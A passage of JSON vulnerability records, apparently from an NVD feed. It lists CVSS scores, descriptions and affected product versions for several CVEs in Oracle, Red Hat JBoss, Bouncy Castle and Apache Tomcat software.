CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2711", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2711"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:jdeveloper:11.1.1.7.0", "cpe:/a:oracle:jdeveloper:11.1.1.2.4", "cpe:/a:oracle:jdeveloper:11.1.1.9.0", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:jdeveloper:11.1.1.7.1"], "id": "CVE-2018-2711", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2711", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:13:45", "description": "Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI). 
The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2584", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2584"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:oracle:webcenter_sites:11.1.1.8.0"], "id": "CVE-2018-2584", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2584", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:14:43", "description": "Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise 
Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-09T17:29:00", "type": "cve", "title": "CVE-2015-7501", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2020-07-15T03:15:00", "cpe": ["cpe:/a:redhat:data_grid:6.0.0", "cpe:/a:redhat:jboss_fuse_service_works:6.0", "cpe:/a:redhat:jboss_enterprise_application_platform:5.0.0", "cpe:/a:redhat:jboss_enterprise_application_platform:4.3.0", "cpe:/a:redhat:jboss_data_virtualization:6.0.0", "cpe:/a:redhat:jboss_a-mq:6.0.0", "cpe:/a:redhat:jboss_portal:6.0.0", "cpe:/a:redhat:jboss_bpm_suite:6.0.0", "cpe:/a:redhat:jboss_enterprise_web_server:3.0.0", "cpe:/a:redhat:jboss_data_virtualization:5.0.0", 
"cpe:/a:redhat:xpaas:3.0.0", "cpe:/a:redhat:subscription_asset_manager:1.3.0", "cpe:/a:redhat:jboss_operations_network:3.0", "cpe:/a:redhat:jboss_enterprise_brms_platform:6.0.0", "cpe:/a:redhat:jboss_enterprise_soa_platform:5.0.0", "cpe:/a:redhat:openshift:3.0", "cpe:/a:redhat:jboss_enterprise_application_platform:6.0.0", "cpe:/a:redhat:jboss_enterprise_brms_platform:5.0.0", "cpe:/a:redhat:jboss_fuse:6.0.0"], "id": "CVE-2015-7501", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7501", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_web_server:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_data_virtualization:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_portal:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:redhat:data_grid:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:subscription_asset_manager:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_bpm_suite:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_fuse_service_works:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:xpaas:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_a-mq:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_soa_platform:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_data_virtualization:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_operations_network:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_fuse:6.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:16:59", "description": "The Bouncy Castle Java library before 1.51 does not validate a point is within the elliptic curve, which makes it easier for remote attackers to obtain 
private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an \"invalid curve attack.\"", "cvss3": {}, "published": "2015-11-09T16:59:00", "type": "cve", "title": "CVE-2015-7940", "cwe": ["CWE-200", "CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2019-01-16T19:29:00", "cpe": ["cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.55", "cpe:/a:oracle:enterprise_manager_ops_center:12.1.4", "cpe:/a:oracle:application_testing_suite:12.5.0.1", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.54", "cpe:/a:bouncycastle:bouncy_castle_crypto_package:1.50", "cpe:/a:oracle:application_testing_suite:12.5.0.2", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:application_testing_suite:12.5.0.3", "cpe:/o:opensuse:leap:42.1", "cpe:/o:opensuse:opensuse:13.1", "cpe:/o:opensuse:opensuse:13.2", "cpe:/a:oracle:virtual_desktop_infrastructure:3.5.2"], "id": "CVE-2015-7940", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7940", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:virtual_desktop_infrastructure:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:application_testing_suite:12.5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:bouncycastle:bouncy_castle_crypto_package:1.50:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-08T17:57:03", "description": "When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2017-10-04T01:29:02", "type": "cve", "title": "CVE-2017-12617", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12617"], "modified": 
"2023-12-08T16:41:18", "cpe": ["cpe:/a:apache:tomcat:7.0.0", "cpe:/a:apache:tomcat:7.0.1", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:7.0.3", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:7.0.6", "cpe:/a:apache:tomcat:7.0.7", "cpe:/a:apache:tomcat:7.0.8", "cpe:/a:apache:tomcat:7.0.9", "cpe:/a:apache:tomcat:7.0.10", "cpe:/a:apache:tomcat:7.0.11", "cpe:/a:apache:tomcat:7.0.12", "cpe:/a:apache:tomcat:7.0.13", "cpe:/a:apache:tomcat:7.0.14", "cpe:/a:apache:tomcat:7.0.15", "cpe:/a:apache:tomcat:7.0.16", "cpe:/a:apache:tomcat:7.0.17", "cpe:/a:apache:tomcat:7.0.18", "cpe:/a:apache:tomcat:7.0.19", "cpe:/a:apache:tomcat:7.0.20", "cpe:/a:apache:tomcat:7.0.21", "cpe:/a:apache:tomcat:7.0.22", "cpe:/a:apache:tomcat:7.0.23", "cpe:/a:apache:tomcat:7.0.24", "cpe:/a:apache:tomcat:7.0.25", "cpe:/a:apache:tomcat:7.0.26", "cpe:/a:apache:tomcat:7.0.27", "cpe:/a:apache:tomcat:7.0.28", "cpe:/a:apache:tomcat:7.0.29", "cpe:/a:apache:tomcat:7.0.30", "cpe:/a:apache:tomcat:7.0.31", "cpe:/a:apache:tomcat:7.0.32", "cpe:/a:apache:tomcat:7.0.33", "cpe:/a:apache:tomcat:7.0.34", "cpe:/a:apache:tomcat:7.0.35", "cpe:/a:apache:tomcat:7.0.36", "cpe:/a:apache:tomcat:7.0.37", "cpe:/a:apache:tomcat:7.0.38", "cpe:/a:apache:tomcat:7.0.39", "cpe:/a:apache:tomcat:7.0.40", "cpe:/a:apache:tomcat:7.0.41", "cpe:/a:apache:tomcat:7.0.42", "cpe:/a:apache:tomcat:7.0.43", "cpe:/a:apache:tomcat:7.0.44", "cpe:/a:apache:tomcat:7.0.45", "cpe:/a:apache:tomcat:7.0.46", "cpe:/a:apache:tomcat:7.0.47", "cpe:/a:apache:tomcat:7.0.48", "cpe:/a:apache:tomcat:7.0.49", "cpe:/a:apache:tomcat:7.0.50", "cpe:/a:apache:tomcat:7.0.51", "cpe:/a:apache:tomcat:7.0.54", "cpe:/a:apache:tomcat:7.0.55", "cpe:/a:apache:tomcat:7.0.56", "cpe:/a:apache:tomcat:7.0.57", "cpe:/a:apache:tomcat:7.0.58", "cpe:/a:apache:tomcat:7.0.59", "cpe:/a:apache:tomcat:7.0.60", "cpe:/a:apache:tomcat:7.0.61", 
"cpe:/a:apache:tomcat:7.0.62", "cpe:/a:apache:tomcat:7.0.63", "cpe:/a:apache:tomcat:7.0.64", "cpe:/a:apache:tomcat:7.0.65", "cpe:/a:apache:tomcat:7.0.66", "cpe:/a:apache:tomcat:7.0.67", "cpe:/a:apache:tomcat:7.0.68", "cpe:/a:apache:tomcat:7.0.69", "cpe:/a:apache:tomcat:7.0.70", "cpe:/a:apache:tomcat:7.0.71", "cpe:/a:apache:tomcat:7.0.72", "cpe:/a:apache:tomcat:7.0.73", "cpe:/a:apache:tomcat:7.0.74", "cpe:/a:apache:tomcat:7.0.75", "cpe:/a:apache:tomcat:7.0.76", "cpe:/a:apache:tomcat:7.0.77", "cpe:/a:apache:tomcat:7.0.79", "cpe:/a:apache:tomcat:7.0.80", "cpe:/a:apache:tomcat:7.0.81", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:8.0.1", "cpe:/a:apache:tomcat:8.0.2", "cpe:/a:apache:tomcat:8.0.4", "cpe:/a:apache:tomcat:8.0.6", "cpe:/a:apache:tomcat:8.0.7", "cpe:/a:apache:tomcat:8.0.9", "cpe:/a:apache:tomcat:8.0.10", "cpe:/a:apache:tomcat:8.0.11", "cpe:/a:apache:tomcat:8.0.12", "cpe:/a:apache:tomcat:8.0.13", "cpe:/a:apache:tomcat:8.0.14", "cpe:/a:apache:tomcat:8.0.15", "cpe:/a:apache:tomcat:8.0.16", "cpe:/a:apache:tomcat:8.0.17", "cpe:/a:apache:tomcat:8.0.18", "cpe:/a:apache:tomcat:8.0.19", "cpe:/a:apache:tomcat:8.0.20", "cpe:/a:apache:tomcat:8.0.21", "cpe:/a:apache:tomcat:8.0.22", "cpe:/a:apache:tomcat:8.0.23", "cpe:/a:apache:tomcat:8.0.24", "cpe:/a:apache:tomcat:8.0.25", "cpe:/a:apache:tomcat:8.0.26", "cpe:/a:apache:tomcat:8.0.27", "cpe:/a:apache:tomcat:8.0.28", "cpe:/a:apache:tomcat:8.0.29", "cpe:/a:apache:tomcat:8.0.30", "cpe:/a:apache:tomcat:8.0.31", "cpe:/a:apache:tomcat:8.0.32", "cpe:/a:apache:tomcat:8.0.33", "cpe:/a:apache:tomcat:8.0.34", "cpe:/a:apache:tomcat:8.0.35", "cpe:/a:apache:tomcat:8.0.36", "cpe:/a:apache:tomcat:8.0.37", "cpe:/a:apache:tomcat:8.0.38", "cpe:/a:apache:tomcat:8.0.39", "cpe:/a:apache:tomcat:8.0.40", "cpe:/a:apache:tomcat:8.0.41", "cpe:/a:apache:tomcat:8.0.42", "cpe:/a:apache:tomcat:8.0.43", "cpe:/a:apache:tomcat:8.0.44", 
"cpe:/a:apache:tomcat:8.0.45", "cpe:/a:apache:tomcat:8.0.46", "cpe:/a:apache:tomcat:8.5.0", "cpe:/a:apache:tomcat:8.5.1", "cpe:/a:apache:tomcat:8.5.2", "cpe:/a:apache:tomcat:8.5.3", "cpe:/a:apache:tomcat:8.5.4", "cpe:/a:apache:tomcat:8.5.5", "cpe:/a:apache:tomcat:8.5.6", "cpe:/a:apache:tomcat:8.5.7", "cpe:/a:apache:tomcat:8.5.8", "cpe:/a:apache:tomcat:8.5.9", "cpe:/a:apache:tomcat:8.5.10", "cpe:/a:apache:tomcat:8.5.11", "cpe:/a:apache:tomcat:8.5.12", "cpe:/a:apache:tomcat:8.5.13", "cpe:/a:apache:tomcat:8.5.14", "cpe:/a:apache:tomcat:8.5.15", "cpe:/a:apache:tomcat:8.5.16", "cpe:/a:apache:tomcat:8.5.17", "cpe:/a:apache:tomcat:8.5.18", "cpe:/a:apache:tomcat:8.5.19", "cpe:/a:apache:tomcat:8.5.20", "cpe:/a:apache:tomcat:8.5.21", "cpe:/a:apache:tomcat:8.5.22", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:9.0.0"], "id": "CVE-2017-12617", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12617", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:beta:*:*:*:*:*:*", 
"cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.5:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.44:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:tomcat:7.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.48:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.55:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.56:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.57:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.58:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.59:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.61:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.62:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.64:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.65:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.66:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.67:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.68:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.69:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.70:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.71:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.72:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.73:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.74:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.75:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.76:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.77:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.79:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.80:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.81:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.4:*:*:*:*:*:*:*", 
